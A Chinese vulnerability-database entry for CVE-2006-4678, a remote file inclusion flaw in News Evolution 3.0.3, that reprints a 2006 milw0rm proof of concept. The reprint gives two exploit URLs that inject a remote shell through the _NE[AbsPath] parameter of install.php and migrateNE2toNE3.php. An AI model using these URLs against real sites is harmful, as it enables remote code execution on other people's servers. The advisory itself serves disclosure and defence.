News Evolution PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110970 漏洞类型 未知
发布时间 2006-09-07 更新时间 2006-09-11
CVE编号 CVE-2006-4678 CNNVD-ID CNNVD-200609-147
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2325
https://www.securityfocus.com/bid/83866
https://cxsecurity.com/issue/WLB-2006090064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-147
|漏洞详情
NewsEvolution3.0.3中的PHP远程文件包含漏洞,远程攻击者可以通过(1)install.php和(2)migrateNE2toNE3.php中的_NE[AbsPath]参数执行任意PHP代码。
|漏洞EXP
# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# News Evolution v3.0.3 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=825
 
# Script  :  News Evolution v3.0.3
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/install.php?_NE[AbsPath]=[shell]
  
     http://www.site.com/[path]/migrateNE2toNE3.php?_NE[AbsPath]=[shell]

# milw0rm.com [2006-09-07]
|受影响的产品
Comscripts News Evolution 3.0.3
|参考资料

来源:XF
名称:news-evolution-install-file-include(28803)
链接:http://xforce.iss.net/xforce/xfdb/28803
来源:BUGTRAQ
名称:20060907NewsEvolutionv3.0.3-RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/445576/100/0/threaded
来源:SREASON
名称:1536
链接:http://securityreason.com/securityalert/1536